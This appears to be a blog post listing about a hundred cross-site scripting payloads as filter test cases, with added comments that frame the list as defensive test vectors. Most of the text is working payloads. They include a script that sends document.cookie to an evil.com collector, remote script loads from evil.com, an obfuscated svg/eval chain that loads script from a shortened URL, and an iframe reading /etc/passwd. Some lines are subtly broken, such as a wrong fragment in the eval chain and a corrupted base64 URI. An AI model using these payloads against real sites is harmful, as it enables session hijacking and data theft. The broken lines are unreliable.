
XSS测试用例

2017/04/27 XSS

0x00
alert confirm prompt

0x01

<!--
  Test vectors for checking that an application's input filtering and
  output encoding neutralise script injection. One vector per line; each
  line is a stand-alone fragment, not a complete document. Per the
  "alert confirm prompt" heading above, execution is judged by whether
  one of those dialogs appears.
  Reviewer notes:
  * Several vectors depend on legacy Internet Explorer behaviour (CSS
    expression(), vbscript:, DYNSRC/LOWSRC, &{ } attribute scripting) or
    on server-side PHP interpolation (<? ... ?>). A filter that "blocks"
    these says little about current browsers; a vector that fails to fire
    is not evidence the sink is safe.
  * Lines containing backslash-escaped quotes (\" ...) look like they were
    copied out of a quoted string literal; the backslashes are part of the
    copy, not of the vector.
  * The correct defence is context-aware output encoding plus a
    Content-Security-Policy, not blocklisting these strings.
-->
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evil.com/cookie.php"></script>
<script>location.href="http://www.evil.com/cookie.php?cookie="+escape(document.cookie)</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xss/) />
<style>@im\port'\js\vasc\ript:alert(\"XSS\")';</style>
<? echo('<scr)';echo('ipt>alert(\"XSS\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://www.evil.com/files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<font style='color:expression(alert(document.cookie))'>
');alert('xss
<img src="javascript:alert('xss')">
<script language='JavaScript'>alert('xss')</script>
[url=javascript:alert('xss')]click me[/url]
<body onunload="javascript:alert('XSS');">
<body onLoad="javascript:alert('XSS');">
[color=red' onmouseover="alert('XSS')"]mouse over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("XSS");
<div style="x.expression((window.r==1)?":eval('r=1;alert(String.fromCharCode(88.83.83));')">
<iframe<?php echo chr(11)?>onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))></script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1;alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "><"
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image:url(\"javascript:alert('XSS')\")}</STYLE><UL><UI>XSS
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^'=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(1111)</script>
<body onLoad="while(true)alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript">alert('X\nS\nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.evil.com/XSS.js'></script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source))</script>
<SCRIPT>document.write("XSS")</SCRIPT>
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
='><script>alert("xXSS")</script>
<script+src=">"+src="http://www.evil.com/XSS.js?69,69"></script>
<body background=javascript:'"><script>alert(navigator.userAgent)</script></body>
">/XsDos/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
Data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnWoMTMzNyk8L3NjcmlwdD4=
"<marquee><img src=k.png onerror=alert(/XSS/) />
"<marquee><img src=k onerror=alert(/XSS/) />
'"><marquee><img src=k.png onerror=alert(/XSS/.source) />
</div><script>alert(123)</script>
"><iframe src='javascrip:alert(document.cookie)'></iframe>
<div style="background:url('javascript:alert(1)')">
<img src='java\nscript:alert(\"XSS\")'>
>"'><img src="javascript:alert('XSS')">
" style="background:url(javascript:alert(/XSS/))"
>"><script>alert(/XSS/)</script>
"></title><script>alert(1)</script>
'"></title><font color=red onmouseover=javascript:alert(1337)>XSS</font>
<SELECT NAME="" onmouseover=alert(123)></select>
<svg+onload=alert('xss')>
<svg+onload=alert('xss')>
<!--
  The following <svg onload=...> lines form ONE vector split across
  several inputs: each assigns a string fragment to a variable and the
  final line eval()s their concatenation. Detection or filtering that
  looks at each line in isolation never sees a complete script; the
  rendered page (all fragments together) is what has to be assessed.
-->
<svg onload=a='document.writ'>
<svg onload=b='e(String.from'>
<svg onload=c='CharCode(60,1'>
<svg onload=d='15,99,114,105'>
<svg onload=e=',112,116,32,1'>
<svg onload=f='15,114,99,61,'>
<svg onload=g='39,104,116,11'>
<svg onload=h='6,112,58,47,4'>
<svg onload=i='7,116,46,99,1'>
<svg onload=j='10,47,82,52,8'>
<svg onload=k='6,84,75,53,66'>
<svg onload=l=',39,62,60,47,'>
<svg onload=m='115,99,114,10'>
<svg onload=n='5,112,116,62)'>
<svg onload=o=');'>
<svg onload=x=a+b+n+d+e+f+g+h>
<svg onload=t=i+j+k+l+m+n+o>
<svg onload=eval(x+t)>
<script>alert'1'</script>
<img src='1' onerror='{alert(1)}'

待测

<!--
  Pending vectors ("待测" = to be tested): listed by the author for later
  verification, not yet confirmed against any target. The same
  alert/confirm/prompt criterion from the section above applies; the
  last two use document.write in onerror instead, so the check is whether
  the written markup appears in the DOM.
-->
"></td><details ontoggle=prompt(123)>

<img src="x" onerror="document.write('test')" />

<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
